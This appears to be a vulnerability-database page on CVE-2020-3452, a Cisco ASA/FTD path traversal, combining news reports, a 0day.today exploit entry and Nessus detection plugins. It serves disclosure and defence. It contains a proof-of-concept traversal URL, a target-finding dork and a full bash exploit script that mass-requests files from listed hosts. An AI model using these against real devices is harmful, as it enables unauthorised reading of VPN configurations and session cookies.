ID CVE-2020-3452 Type cve Reporter cve@mitre.org Modified 2020-07-29T20:15:00
Description
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.
{"threatpost": [{"lastseen": "2020-07-25T08:16:29", "bulletinFamily": "info", "description": "A high-severity vulnerability in Cisco\u2019s network security software could lay bare sensitive data \u2013 such as WebVPN configurations and web cookies \u2013 to remote, unauthenticated attackers.\n\nThe flaw exists in the web services interface of Cisco\u2019s Firepower Threat Defense (FTD) software, which is part of its suite of network security and traffic management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network security devices.\n\n\u201cAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device,\u201d according to a [Wednesday advisory from Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86>). \u201cA successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability ([CVE-2020-3452](<https://nvd.nist.gov/vuln/detail/CVE-2020-3452>)), which ranks 7.5 out of 10 on the CVSS scale, is due to a lack of proper input validation of URLs in HTTP requests processed by affected devices. Specifically, the vulnerability allows attackers to conduct directory traversal attacks, which is an HTTP attack enabling bad actors to access restricted directories and execute commands outside of the web server\u2019s root directory.\n\n\u201cThis vulnerability\u2026 is highly dangerous,\u201d said Mikhail Klyuchnikov of Positive Technologies, who was credited with independently reporting the flaw (along with Ahmed Aboul-Ela of RedForce), in a statement provided to Threatpost. \u201cThe cause is a failure to sufficiently verify inputs. An attacker can send a specially crafted HTTP request to gain access to the file system (RamFS), which stores data in RAM.\u201d\n\nA potential attacker can view files within the web services file system only. The web services file system is enabled for specific WebVPN and AnyConnect features (outlined in Cisco\u2019s advisory). The web services files that the attacker can view may have information such as WebVPN configuration, bookmarks, web cookies, partial web content and HTTP URLs.\n\nCisco said the vulnerability affects products if they are running a vulnerable release of Cisco ASA Software or Cisco FTD Software, with a vulnerable AnyConnect or WebVPN configuration: \u201cThe web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features,\u201d according to its advisory. However, \u201cthis vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\u201d\n\nTo eliminate the vulnerability, Klyuchnikov urged Cisco users to update Cisco ASA to the most recent version. Cisco said it\u2019s not aware of any malicious exploits for the vulnerability \u2013 however, it is aware of proof-of-concept (POC) exploit code [released Wednesday](<https://twitter.com/aboul3la>) by security researcher Ahmed Aboul-Ela.\n\n> Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.\n> \n> For example to read \"/+CSCOE+/portal_inc.lua\" file.\n> \n> https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n> \n> Happy Hacking! [pic.twitter.com/aBA3R7akkC](<https://t.co/aBA3R7akkC>)\n> \n> \u2014 Ahmed Aboul-Ela (@aboul3la) [July 22, 2020](<https://twitter.com/aboul3la/status/1286012324722155525?ref_src=twsrc%5Etfw>)\n\nEarlier in May, Cisco stomped out [12 high-severity vulnerabilities](<https://threatpost.com/cisco-fixes-high-severity-flaws-in-firepower-security-software-asa/155568/>) across its ASA and FTD network security products. The flaws could be exploited by unauthenticated remote attackers to launch an array of attacks \u2013 from denial of service (DoS) to sniffing out sensitive data.\n", "modified": "2020-07-23T19:49:49", "published": "2020-07-23T19:49:49", "id": "THREATPOST:C51D2F2366676BB018956D93916AC33E", "href": "https://threatpost.com/network-security-cisco-flaw-leaks-sensitive-data/157691/", "type": "threatpost", "title": "Cisco Network Security Flaw Leaks Sensitive Data", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-07-28T05:51:11", "bulletinFamily": "info", "description": "Cisco is warning that a high-severity flaw in its network security software is being actively exploited \u2013 allowing remote, unauthenticated attackers to access sensitive data.\n\nPatches for the vulnerability ([CVE-2020-3452](<https://nvd.nist.gov/vuln/detail/CVE-2020-3452>)) in question, which ranks 7.5 out of 10 on the CVSS scale, were [released last Wednesday](<https://threatpost.com/network-security-cisco-flaw-leaks-sensitive-data/157691/>). However, attackers have since been targeting vulnerable versions of the software, where the patches have not yet been applied.\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is aware of the existence of public exploit code and active exploitation of the vulnerability that is described in this advisory,\u201d according to Cisco.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe flaw specifically exists in the web services interface of Firepower Threat Defense (FTD) software, which is part of Cisco\u2019s suite of network security and traffic management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network security devices.\n\nThe potential threat surface is vast: [Researchers with Rapid7](<https://blog.rapid7.com/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/>) recently found 85,000 internet-accessible ASA/FTD devices. Worse, 398 of those are spread across 17 percent of the Fortune 500, researchers said.\n\nThe flaw stems from a lack of proper input validation of URLs in HTTP requests processed by affected devices. Specifically, the flaw allows attackers to conduct directory traversal attacks, which is an HTTP attack enabling bad actors to access restricted directories and execute commands outside of the web server\u2019s root directory.\n\nSoon after patches were released, proof-of-concept (POC) exploit code was [released Wednesday](<https://twitter.com/aboul3la>) for the flaw by security researcher Ahmed Aboul-Ela.\n\nA potential attacker can view more sensitive files within the web services file system: The web services files may have information such as WebVPN configuration, bookmarks, web cookies, partial web content and HTTP URLs.\n\n> There\u2019s a proof of concept doing the rounds for directory path traversal (yes, it\u2019s 1998 again) in Cisco AnyConnect SSL VPN. \n> \n> It\u2019s already being mass spammed across internet. \n> \n> As far as I can see people can only read LUA source files so far, so not terribly problematic as is. <https://t.co/kSIFQdz1go>\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [July 24, 2020](<https://twitter.com/GossiTheDog/status/1286614404054880256?ref_src=twsrc%5Etfw>)\n\nCisco said the vulnerability affects products if they are running a vulnerable release of Cisco ASA Software or Cisco FTD Software, with a vulnerable AnyConnect or WebVPN configuration: \u201cThe web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features,\u201d according to its advisory. However, \u201cthis vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/07/27115136/cisco-vulnerability-patch.png>)\n\nCredit: Rapid7\n\nResearchers with Rapid7 say that since the patch was issued, only about 10 percent of Cisco ASA/FTD devices detected as internet-facing have been rebooted \u2013 which is a \u201clikely indicator they\u2019ve been patched.\u201d Only 27 of the 398 detected in Fortune 500 companies appear to have been rebooted.\n\nResearchers encourage immediate patching of vulnerable ASA/FTD installations \u201cto prevent attackers from obtaining sensitive information from these devices which may be used in targeted attacks.\u201d\n\n\u201cCisco has provided fixes for all supported versions of ASA and FTD components,\u201d said researchers. \u201cCisco ASA Software releases 9.5 and earlier, as well as Release 9.7, along with Cisco FTD Release 6.2.2 have reached the end of software maintenance and organizations will have to upgrade to a later, supported version to fix this vulnerability.\u201d\n\n_**Complimentary Threatpost Webinar**: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts together to explore how **Confidential**** Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar._\n", "modified": "2020-07-27T16:23:16", "published": "2020-07-27T16:23:16", "id": "THREATPOST:FB3A73274A678D5DA8D5263B9E1A1DA1", "href": "https://threatpost.com/attackers-exploiting-high-severity-network-security-flaw-cisco-warns/157756/", "type": "threatpost", "title": "Attackers Exploiting High-Severity Network Security Flaw, Cisco Warns", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2020-07-29T17:58:42", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2020-07-29T00:00:00", "published": "2020-07-29T00:00:00", "id": "1337DAY-ID-34760", "href": "https://0day.today/exploit/description/34760", "title": "Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion Exploit", "type": "zdt", "sourceData": "# Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion\r\n# Google Dork: inurl:/+CSCOE+/\r\n# Date: 2020-08-27\r\n# Exploit Author: 0xmmnbassel\r\n# Vendor Homepage: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\r\n# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60\r\n# Vulnerability Type: unauthenticated file read\r\n# CVE: CVE-2020-3452\r\n\r\n\r\n#!/bin/bash\r\n\r\n\r\nread=\"%2bCSCOE%2b/portal_inc.lua\"\r\n\r\n\r\nhelpFunction()\r\n{\r\n echo \"\"\r\n echo -e \"\\t\\tCVE-2020-3452\"\r\n echo \"\"\r\n echo \"Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua \"\r\n echo -e \"\\t-l for list of IPs in text file\"\r\n echo -e \"\\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua\"\r\n echo -e \"\\t-i for single IP test\"\r\n exit 1\r\n}\r\n\r\nwhile getopts \"l:r:i:\" opt\r\ndo\r\n case \"$opt\" in\r\n l ) input=\"$OPTARG\" ;;\r\n r ) read=\"$OPTARG\" ;;\r\n i ) website=\"$OPTARG\" ;;\r\n ? ) helpFunction ;;\r\n esac\r\ndone\r\n\r\n\r\n\r\n#if $website is empty or $input is empty\r\nif [ -z \"$website\" ] && [ -z \"$input\" ]\r\nthen\r\n echo \"Some/all of the parameters are empty\";\r\n helpFunction\r\nfi\r\n\r\n#usage\r\n\r\n\r\nif [ -z \"$website\"];\r\n then\r\n while IFS= read -r line\r\n do\r\n name=$(echo $line | cut -c9-19)\r\n #echo \"testing $line\"\r\n filename=\"$name.txt\"\r\n #echo $response\r\n status=$(curl -LI $line\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s)\r\n\r\n if [ $status -eq \"400\" ]; then\r\n echo \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\"\r\n else\r\n wget \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt\r\n\r\n if [ -s $filename ]; then\r\n echo \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\"\r\n echo \"downloaded!, $line is vulnerable to CVE-2020-3452.\"\r\n\r\n else\r\n echo \"not vulnerable!\"\r\n rm -rf $filename\r\n fi\r\n fi\r\n done < \"$input\"\r\n else\r\n\r\n name=$(echo $website | cut -c9-16)\r\n filename=\"$name.txt\"\r\n\r\n status=$(curl -LI $website\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s)\r\n if [ $status -eq \"Bad Request\" ]; then\r\n echo \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\"\r\n else\r\n\r\n echo \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\"\r\n wget \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt\r\n if [ -s $filename ]; then\r\n echo \"downloaded!, $website is vulnerable to CVE-2020-3452.\"\r\n else\r\n echo \"not vulnerable!\"\r\n rm -rf $filename\r\n fi\r\n fi\r\n\r\nfi\n\n# 0day.today [2020-07-29] #", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://0day.today/exploit/34760"}], "nessus": [{"lastseen": "2020-07-28T09:11:08", "bulletinFamily": "scanner", "description": "A vulnerability exists in the web services interface of Cisco Adaptive Security Appliance (ASA) Software. An\nunauthenticated, remote attacker can exploit this, by sending a crafted HTTP request containing directory traversal\ncharacter sequences to an affected device, in order to read sensitive files on the targeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application", "modified": "2020-07-24T00:00:00", "id": "CISCO-SA-ASAFTD-RO-PATH-KJUQHB86-ASA.NASL", "href": "https://www.tenable.com/plugins/nessus/138894", "published": "2020-07-24T00:00:00", "title": "Cisco Adaptive Security Appliance Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)", "type": "nessus", "sourceData": "#TRUSTED 90498eaf059df17733fa5542dc9f512b16a611e7d252485277dd13385622745479327e4eaac22a30138f8b6c23a5fdcfb23fdab8895b0cf3bdd9d831b873bb0d8240c8a202d82ed83343c821efdf6d7ad59fb75de7e2f36fa99bbd47a6ced0bce848967b4a088f7a73e98ad9bc4fd0c914e64e5c6fe0b1406feb8cef3eb0c80a83d882497ae06d910ba935412a76023c5f0945fc62498d2a17f3117f8f5943a1cd2733091ebf59bf89fc4890ef8e04663d1c8288b1a3159565b7305fae4260847a328c8226aa8ab80e6a35e1ae327bd2542fc7ceac57fdea0961e5d04d9ccf6f946128a39a5ec4ecaa9e77c8fb72307ccaf72101dd20ced7e5b1a247b9f0834b7c5ffe80615f1a0656ee567534f67941690ef2c63e08cb5acb5243aef785486d4b093a6c06bf3a61ae6bfb91a188cb22afb1c5e692053f8554ac7dd35b736716cdbddaf4934ce02e16f0a03b826ed295ef3bd5d331683cd39ea4f81323a3343671d3193bef85fb38734d8ad442e6e8ef69b553daca1d5d97fab117f0648bac40aba9458588f41b17905462520e4cc98ae7ae6222e48eb70215d20e745e67e9829b5a07144be00959a1e35a68d43cc1af99bfa930f45ff742cc0cbc72beaad3c7131e5ea48e6e3fb2fafc283bd58f2c66c8901b457dceb83fb5c2f940990eccfcf689bc5042926b1c7acb76a6e6e63954b29e249970953acfbfeee13fa18e79bb\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138894);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/27\");\n\n script_cve_id(\"CVE-2020-3452\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvt03598\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-asaftd-ro-path-KJuQhB86\");\n script_xref(name:\"IAVA\", value:\"2020-A-0338\");\n\n script_name(english:\"Cisco Adaptive Security Appliance Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"A vulnerability exists in the web services interface of Cisco Adaptive Security Appliance (ASA) Software. An\nunauthenticated, remote attacker can exploit this, by sending a crafted HTTP request containing directory traversal\ncharacter sequences to an affected device, in order to read sensitive files on the targeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3f081787\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvt03598\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in the Cisco Security Advisory\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3452\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:adaptive_security_appliance_software\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"Host/Cisco/ASA\");\n\n exit(0);\n}\ninclude('ccf.inc');\ninclude('cisco_workarounds.inc');\n\nproduct_info = cisco::get_product_info(name:'Cisco Adaptive Security Appliance (ASA) Software');\n\nvuln_ranges = [\n {'min_ver' : '0.0', 'fix_ver' : '9.6.4.42'},\n {'min_ver' : '9.7', 'fix_ver' : '9.8.4.20'},\n {'min_ver' : '9.9', 'fix_ver' : '9.9.2.74'},\n {'min_ver' : '9.10', 'fix_ver' : '9.10.1.42'},\n {'min_ver' : '9.12', 'fix_ver' : '9.12.3.12'},\n {'min_ver' : '9.13', 'fix_ver' : '9.13.1.10'},\n {'min_ver' : '9.14', 'fix_ver' : '9.14.1.10'},\n];\n\nworkarounds = make_list(CISCO_WORKAROUNDS['anyconnect_client_services'], CISCO_WORKAROUNDS['ssl_vpn']);\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_WARNING,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvt03598',\n 'cmds' , make_list('show running_config')\n);\n\ncisco::check_and_report(\n product_info:product_info,\n workarounds:workarounds,\n reporting:reporting,\n vuln_ranges:vuln_ranges\n);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-07-28T09:11:08", "bulletinFamily": "scanner", "description": "A vulnerability exists in the web services interface of Cisco Firepower Threat Defense (FTD) Software. An\nunauthenticated, remote attacker can exploit this, by sending a crafted HTTP request containing directory traversal\ncharacter sequences to an affected device, in order to read sensitive files on the targeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application", "modified": "2020-07-24T00:00:00", "id": "CISCO-SA-ASAFTD-RO-PATH-KJUQHB86-FTD.NASL", "href": "https://www.tenable.com/plugins/nessus/138895", "published": "2020-07-24T00:00:00", "title": "Cisco Firepower Threat Defense Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)", "type": "nessus", "sourceData": "#TRUSTED 9af5466d54a531ff938e8fef5bea3a8af113173a91f9d0244ff959ffa0a4fd4c5f08fa836c87152112b967d62ee1827b1c5b96b4df48a9e6a5253e2410b3403d320169d12a3ecb9b1764c574a37bc78786f0623fe70364da52465c2e1fb12bd9397ec8d75c6107072066ad8acf54b1921ad0a8bdb7d2a2949918ee204162cfd6daa61d89c3ae95410be6a9e7a2a447fa309b30fabee0b340e59670937ad0ce5bac9033f0cc91c87d92095354ea5be9b528509a53d6fbdc79fb00b741d34876ccef439304eecc4b3b12fd63d9201d05e5aabf9a120bf24b389d819c82f4547678118d2a07420dd28b65f30119deeb7cfbd22092dd8183cbdee9a18515ac3d79dfca7ebee3edd6ece3d6846b55eb5991d9c72404a70b51acf1d863a15ce0aa26ed8d1a2c26dff14c2f871ffce05db85abb8f5c262d14c284b8991342bd8330408271852e741c1b4afb1e88091d45303f7ab71da7c609f9db287274fb39b5f0a8d649f6c08cc50cbd644e97ba17390fd50562e73f434e0cfa89fa460f2c3146ccaa539faa21901a9f9627291d7700f3d432456cc3199a573d40e80e84382d9503a45ea99db34682d99510c072382b3d08eaf3fbac10f9f8f16a6531eab6a0703fda558d404e474a6d0759e5cc6a78e85bb659ddf5063672b7fc4c76133b89a4f9ce369b7d464df4c0abfd22f25639630fe1a8bbeb0aadee71feed624d4828e50d36\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138895);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/27\");\n\n script_cve_id(\"CVE-2020-3452\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvt03598\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-asaftd-ro-path-KJuQhB86\");\n script_xref(name:\"IAVA\", value:\"2020-A-0338\");\n\n script_name(english:\"Cisco Firepower Threat Defense Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"A vulnerability exists in the web services interface of Cisco Firepower Threat Defense (FTD) Software. An\nunauthenticated, remote attacker can exploit this, by sending a crafted HTTP request containing directory traversal\ncharacter sequences to an affected device, in order to read sensitive files on the targeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3f081787\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvt03598\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in the Cisco Security Advisory\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3452\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:firepower_threat_defense\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_enumerate_firepower.nbin\");\n script_require_keys(\"installed_sw/Cisco Firepower Threat Defense\", \"Host/Cisco/Firepower\");\n\n exit(0);\n}\n\ninclude('cisco_workarounds.inc');\ninclude('ccf.inc');\n\nproduct_info = cisco::get_product_info(name:'Cisco Firepower Threat Defense');\n\nvuln_ranges = [\n {'min_ver' : '6.2.2', 'fix_ver': '6.2.3.16'},\n {'min_ver' : '6.3.0', 'fix_ver': '6.3.0.6'},\n {'min_ver' : '6.4.0', 'fix_ver': '6.4.0.10'},\n {'min_ver' : '6.5.0', 'fix_ver': '6.5.0.5'},\n {'min_ver' : '6.6.0', 'fix_ver': '6.6.0.1'},\n];\n\n# Indicates that we've authenticated to an FTD CLI. Required for workaround check, set in\n# ssh_get_info2_cisco_firepower.inc. This should always be present.\nis_ftd_cli = get_kb_item_or_exit(\"Host/Cisco/Firepower/is_ftd_cli\");\n# Indicates that we've successfully run \"rpm -qa --last\" in expert mode to get the list of applied hotfixes. \nexpert = get_kb_item(\"Host/Cisco/FTD_CLI/1/expert\");\n\n# This plugin needs both a workaround and hotfix check. If we can't check either of them, require paranoia to run.\nif (!is_ftd_cli || !expert)\n{\n if (report_paranoia < 2)\n audit(AUDIT_PARANOID);\n}\n\n# Don't set workarounds or hotfixes if we can't check for these.\nif (!is_ftd_cli)\n{\n workarounds = make_list();\n extra = 'Note that Nessus was unable to check for workarounds or hotfixes';\n}\nelse\n{\n # Workarounds can be checked with just the FTD CLI\n workarounds = make_list(CISCO_WORKAROUNDS['anyconnect_client_services'], CISCO_WORKAROUNDS['ssl_vpn']);\n cmds = make_list('show running-config');\n # To check hotfixes, Host/Cisco/FTD_CLI/1/expert should be set to 1\n if (expert)\n {\n hotfixes['6.3.0'] = {'hotfix' : 'Hotfix_AV-6.3.0.6-3', 'ver_compare' : FALSE};\n hotfixes['6.4.0'] = {'hotfix' : 'Hotfix_BM-6.4.0.10-2', 'ver_compare' : FALSE};\n hotfixes['6.5.0'] = {'hotfix' : 'Hotfix_O-6.5.0.5-3', 'ver_compare' : FALSE};\n }\n else\n extra = 'Note that Nessus was unable to check for hotfixes';\n}\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_WARNING,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvt03598',\n 'fix' , 'See vendor advisory',\n 'extra' , extra\n);\n\nif (max_index(cmds) > 0)\n reporting['cmds'] = cmds;\n\ncisco::check_and_report(\n product_info:product_info,\n reporting:reporting,\n vuln_ranges:vuln_ranges,\n workarounds:workarounds,\n firepower_hotfixes:hotfixes\n);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-08-08T09:15:04", "bulletinFamily": "scanner", "description": "A vulnerability exists in the web services interface of Cisco Adaptive Security Appliance (ASA) and Firepower Threat\nDefense (FTD) Software. An unauthenticated, remote attacker can exploit this, by sending a crafted HTTP request\ncontaining directory traversal character sequences to an affected device, in order to read sensitive files on the\ntargeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.", "modified": "2020-07-29T00:00:00", "id": "CISCO-SA-ASAFTD-RO-PATH-KJUQHB86_DIRECT.NASL", "href": "https://www.tenable.com/plugins/nessus/139064", "published": "2020-07-29T00:00:00", "title": "Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139064);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/07\");\n\n script_cve_id(\"CVE-2020-3452\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvt03598\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-asaftd-ro-path-KJuQhB86\");\n script_xref(name:\"IAVA\", value:\"2020-A-0338\");\n\n script_name(english:\"Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"A vulnerability exists in the web services interface of Cisco Adaptive Security Appliance (ASA) and Firepower Threat\nDefense (FTD) Software. An unauthenticated, remote attacker can exploit this, by sending a crafted HTTP request\ncontaining directory traversal character sequences to an affected device, in order to read sensitive files on the\ntargeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3f081787\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvt03598\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in the Cisco Security Advisory\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3452\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"patch_publication_date\", 